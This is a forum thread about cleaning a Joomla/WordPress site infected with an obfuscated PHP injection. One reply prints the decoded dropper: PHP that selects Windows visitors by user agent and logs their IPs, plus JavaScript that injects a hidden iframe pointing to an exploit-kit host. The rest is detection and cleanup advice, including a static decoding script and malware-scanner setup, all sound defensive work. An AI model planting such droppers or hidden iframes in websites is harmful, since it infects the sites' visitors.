
Website Hacked! How To Remove Blackhole Exploit Kit?

Discussion in 'General Scripting Chat' started by redmoon, Oct 14, 2012.

  1. redmoon

    redmoon Regular Member

    Joined:
    Aug 19, 2009
    Messages:
    245
    Likes Received:
    73
    A website I work on was hacked and I believe it's the Blackhole Exploit Kit. The site uses Joomla and Wordpress and the index.php pages show this obfuscated code at the top of the file:

    Code:
    <?php eval(gzinflate(base64_decode('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')));?>

    When I remove it the code reappears. Can anyone tell me where to start to remove the hack? I've changed ftp, database, and login passwords but the virus keeps coming back. Also, can anyone decode the script above so I know what it does?
     
  2. ReALeST

    ReALeST Power Member

    Joined:
    May 16, 2012
    Messages:
    584
    Likes Received:
    399
    Probably an XSS attack... sorry mate, just pray he hasn't owned your db too :p
     
    • Thanks Thanks x 1
  3. Newelly

    Newelly Regular Member

    Joined:
    Jul 25, 2012
    Messages:
    306
    Likes Received:
    93
    Location:
    ViceOffers
    I have never come across anything like this, so I won't have a clue... Never had anything similar while owning websites and forums in the past; however, have you thought about checking out:

    forums.devshed

    They offer a variety of sections for hacking, decrypting and all that kind of stuff...
    By all means I am not advertising or anything, I just feel like it's a more suitable forum for something like this! Maybe someone here can decode/decrypt it, but I am new here so I hardly know anyone here or their capabilities.

    I have decoded this: Newelly08 < is my s/k/y/p/e
    since I can't post links here.

    ~Newelly!
     
    Last edited: Oct 14, 2012
  4. sockpuppet

    sockpuppet Junior Member

    Joined:
    Nov 7, 2011
    Messages:
    155
    Likes Received:
    145
    Maybe there are some more files infected and these files write that shit into your index.php. You should look for 'eval', 'gzinflate' and 'base64_decode' in all your php files.

    decoded php:
    Code:
    if (!isset($ftl)){ global $ftl; $ftl=1;
        // visitor IP, web root and browser UA; $dbf is a hidden log file in the web root named md5(DOCUMENT_ROOT)
        $ip=$_SERVER["REMOTE_ADDR"]; $dr=$_SERVER["DOCUMENT_ROOT"]; $ua=$_SERVER['HTTP_USER_AGENT']; $dbf=$dr.'/'.md5($dr);
        // only Windows visitors on MSIE or Firefox, and only if this IP is not already in the log file
        if((strpos($ua,'Windows')!==false)&&((strpos($ua,'MSIE')!==false)||(strpos($ua,'Firefox')!==false))&&(strpos(@file_get_contents($dbf),$ip) === false)){
            error_reporting(0);
            // second obfuscated layer: the javascript below gets written into the page
            print(gzinflate(base64_decode('7L0HY...  --zip-- ...//w==')));
            // record the IP so the payload is served only once per visitor (this is why it is hard to reproduce)
            if ($fp = @fopen($dbf , "a")){fputs($fp , $ip.'|'); fclose($fp);}
        }
    }

    the decoded javascript that the print call writes:
    Code:
    // injects a hidden 10x10 iframe pointing at the exploit kit landing page
    if (document.getElementsByTagName('body')[0]){
        iframer();
    } else {
        document.write("<iframe src='http://jjzrsgs.dns-dns.com/t/vc.php?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
    }
    function iframer(){
        var f = document.createElement('iframe');
        f.setAttribute('src','http://jjzrsgs.dns-dns.com/t/vc.php?go=2');
        f.style.visibility='hidden'; f.style.position='absolute'; f.style.left='0'; f.style.top='0';
        f.setAttribute('width','10'); f.setAttribute('height','10');
        document.getElementsByTagName('body')[0].appendChild(f);
    }
     
    • Thanks Thanks x 1
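    A small static triage script for the cleanup sockpuppet describes (an added example, not code from the thread or from any of the posters): it walks a web root for PHP files containing the eval/gzinflate/base64_decode tokens, unwraps nested eval(gzinflate(base64_decode('...'))) layers with zlib instead of running them, and checks for the per-visitor IP log the decoded dropper keeps at DOCUMENT_ROOT/md5(DOCUMENT_ROOT). The infected index.php it scans is a constructed sample wrapping a harmless echo, built the same way as the real wrapper; the directory layout and file names are assumptions.

```python
"""Static triage for eval(gzinflate(base64_decode(...))) droppers.

Added example, not from the thread. Nothing decoded here is ever executed.
"""
import base64
import hashlib
import os
import re
import tempfile
import zlib

# Outer wrapper as seen at the top of the infected index.php.
WRAPPER = re.compile(
    r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*'([A-Za-z0-9+/=]+)'\s*\)\s*\)\s*\)",
    re.S,
)
SUSPECT_TOKENS = ("eval(", "gzinflate(", "base64_decode(")


def gzinflate(data: bytes) -> bytes:
    """PHP gzinflate() is raw DEFLATE with no zlib/gzip header: wbits=-15."""
    return zlib.decompress(data, -15)


def unwrap(source: str, max_depth: int = 10) -> list:
    """Return each decoded layer in turn, following nested wrappers."""
    layers = []
    current = source
    for _ in range(max_depth):
        m = WRAPPER.search(current)
        if not m:
            break
        current = gzinflate(base64.b64decode(m.group(1))).decode("latin-1")
        layers.append(current)
    return layers


def scan_tree(root: str) -> dict:
    """Map every suspect .php file under root to its decoded layers."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="latin-1") as fh:
                src = fh.read()
            if any(tok in src for tok in SUSPECT_TOKENS):
                findings[path] = unwrap(src)
    return findings


def ip_log_path(document_root: str) -> str:
    """Where the decoded dropper logs served IPs: $dr.'/'.md5($dr)."""
    digest = hashlib.md5(document_root.encode()).hexdigest()
    return os.path.join(document_root, digest)


# --- constructed sample: a harmless payload wrapped like the real one -------
def build_sample(payload: str) -> str:
    """Produce <?php eval(gzinflate(base64_decode('...')));?> around payload."""
    comp = zlib.compressobj(level=9, wbits=-15)
    raw = comp.compress(payload.encode()) + comp.flush()
    return "<?php eval(gzinflate(base64_decode('%s')));?>" % base64.b64encode(raw).decode()


def demo() -> dict:
    inner = "echo 'constructed harmless payload';"  # stands in for the dropper
    with tempfile.TemporaryDirectory() as docroot:  # assumed web root
        with open(os.path.join(docroot, "index.php"), "w") as fh:
            fh.write(build_sample(inner) + "\n<?php echo 'site'; ?>")
        with open(os.path.join(docroot, "clean.php"), "w") as fh:
            fh.write("<?php echo 'nothing to see'; ?>")
        # simulate the dropper's IP log so the artifact check has a hit
        open(ip_log_path(docroot), "a").close()
        findings = scan_tree(docroot)
        return {
            "suspect_files": sorted(os.path.basename(p) for p in findings),
            "decoded": findings[os.path.join(docroot, "index.php")][0],
            "ip_log_present": os.path.exists(ip_log_path(docroot)),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=", value)
```

    Run it against a copy of the web root rather than the live site. The token scan will also flag legitimate code that happens to call eval or base64_decode, so treat hits as a worklist, not a verdict; the md5-named file in the web root, on the other hand, is a specific artifact of this dropper and worth deleting along with the wrapper so the "only once per IP" behaviour stops hiding the infection from your own tests.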
  5. redmoon

    redmoon Regular Member

    Joined:
    Aug 19, 2009
    Messages:
    245
    Likes Received:
    73
    I think so too. I've checked most of the php files and I think it's a backdoor I missed. Appreciate the help!
    @Realest I really hope this shit isn't in the db, but the way it keeps coming back it might be.
     
    Last edited: Oct 15, 2012
  6. latinofever

    latinofever Junior Member

    Joined:
    Mar 27, 2011
    Messages:
    190
    Likes Received:
    26
    Location:
    Planet Earth
    Home Page:
    I suggest you install maldet on your server, then do a full scan for malware and backdoor scripts.

    To install on CentOS:

    cd /usr/local/src/
    wget http://www.rfxn.com/downloads/maldetect-current.tar.gz
    tar -xzf maldetect-current.tar.gz
    cd maldetect-*

    sh ./install.sh
    or
    sudo sh ./install.sh

    maldet --update-ver

    Then run
    maldet --scan-all /

    This will run a scan.
     
    • Thanks Thanks x 2
    Last edited: Oct 28, 2012